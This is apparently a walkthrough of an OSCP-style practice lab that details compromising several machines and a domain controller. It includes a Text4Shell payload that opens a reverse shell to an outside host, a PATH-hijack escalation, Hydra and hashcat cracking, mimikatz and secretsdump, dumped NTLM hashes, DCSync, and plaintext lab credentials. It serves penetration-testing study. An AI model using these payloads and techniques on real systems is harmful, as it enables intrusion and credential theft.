Skip to content

OSCP B

Network

Given:

  • 192.168.145.147 MS01
  • 192.168.145.149
  • 192.168.145.150
  • 192.168.145.151

Found:

  • 10.10.105.146 DC01
  • 10.10.105.148 MS02

Creds

eric.wallows:EricLikesRunning800 (given creds for 192.168.145.147)
web_svc:Diamond1
sql_svc:Dolphin1
Administrator:December31 (local admin on MS01)

other users:

Network Enumeration

192.168.145.149

Enumeration

Performing a UDP scan reveals SNMP.

Initial Access

Scanning it with snmpwalk extended.

We discover the user kiero with a default password. We'll use Hydra with the -e nsr option to try the same password as the username, null, or reversed.

hydra ftp://192.168.188.149 -l kiero -P /usr/share/wordlists/rockyou.txt.gz -e nsr

And we get kiero:kiero.

Testing FTP access:

Download the keys and inspect them.

The public key mentions the user john, so we'll try SSH.

Privilege Escalation

Get the local flag.

RESET_PASSWD has the SUID bit set. Download the program and analyze it with strings.

We observe that it calls chpasswd without an absolute path.

This allows us to hijack the PATH and create a malicious program with the same name in /tmp. Add /tmp to the PATH.

Create a simple script in /tmp/chpasswd and make it executable:

echo 'echo "root:kiero" | /usr/sbin/chpasswd'

Prepend /tmp to John's PATH and execute RESET_PASSWD:

export PATH=/tmp:$PATH

Post Exploitation

192.168.145.150

Enumeration

A webpage on port 8080 shows that there is an API running.

Using feroxbuster, we find /search and /CHANGELOG.

Initial Access

Searching for vulnerabilities in Apache Commons Text 1.8, we find Text4Logs.

https://github.com/sunnyvale-it/CVE-2022-42889-PoC

Executing ${script:javascript:java.lang.Runtime.getRuntime().exec('busybox nc 192.168.45.229 443 -e sh')} in the search function gives us a shell. (URL encoded with CyberChef)

Privilege Escalation

Get the flag

In /opt, we find the project and an App.java file. This app opens a socket on port 5000.

Using ss, we see an internal port 8000.

Using ps aux, we observe that the port is for Java debugging.

Transfer chisel and create a tunnel to access the port.

We use jdwp-shellifier https://github.com/IOActive/jdwp-shellifier.

In the command, we set the SUID bit to make /bin/bash executable by root. While the debugger waits for the program to execute, we use nc to port 5000 to reach the breakpoint.

Then, we check with the dev user.

Post Exploitation

192.168.145.151

Enumeration

Initial Access

The HTTP server has nothing. Let's search for an exploit for port 8021, freeswitch-event.

We can use a PowerShell reverse shell.

And we get a shell.

Privilege Escalation

Get the local flag

Chris has SeImpersonatePrivilege.

Transfer juicypotato-ng to the machine, create a reverse shell with msfvenom, and listen on port 8888.

Post Exploitation

192.168.145.147

Enumeration

Initial Access

Use the provided credentials to SSH into the machine.

Privilege Escalation

Transfer adPEAS.

Transfer chisel, create a tunnel, and retrieve Kerberoastable user hashes.

hashcat -m 13100 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz --force

We get web_svc:Diamond1 and sql_svc:Dolphin1.

User eric has SeImpersonatePrivilege, so we transfer printerspoofer.

Post Exploitation

Transfer mimikatz to the host.

sekurlsa::logonpassword

Using hashcat.

Start an SSH tunnel to scan and work in the internal network.

Performing a ping sweep reveals the third machine.

10.10.105.148

Enumeration

Initial Access

Using sql_svc:Dolphin1, we connect to MSSQL on MS02.

proxychains -q impacket-mssqlclient 'oscp.exam/sql_svc:Dolphin1@10.10.105.148' -windows-auth

Privilege Escalation

In the pivot, transfer nc.exe, start a listener, and initiate a PowerShell reverse shell within MSSQL.

We notice windows.old, so we retrieve SAM and SYSTEM.

Transfer them to the pivot via SMB share.

mkdir tests
New-SmbShare -Name "tests" -Path "C:\tests" -FullAccess "Everyone"

Create an SMB share on Kali and copy them again.

Using secretsdump, we retrieve the hashes for MS02.

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:acbb9b77c62fdd8fe5976148a933177a:::
tom_admin:1001:aad3b435b51404eeaad3b435b51404ee:4979d69d4ca66955c075c41cf45f24dc:::
Cheyanne.Adams:1002:aad3b435b51404eeaad3b435b51404ee:b3930e99899cb55b4aefef9a7021ffd0:::
David.Rhys:1003:aad3b435b51404eeaad3b435b51404ee:9ac088de348444c71dba2dca92127c11:::
Mark.Chetty:1004:aad3b435b51404eeaad3b435b51404ee:92903f280e5c5f3cab018bd91b94c771:::

10.10.105.146 DC

Enumeration

Initial Access

Using the hash from tom_admin obtained in MS02, we use evil-winrm to access.

Privilege Escalation

As tom_admin is privileged, we perform a DCsync attack to retrieve all the hashes.

Use the admin hash to access via winrm.

Post Exploitation

Get the proof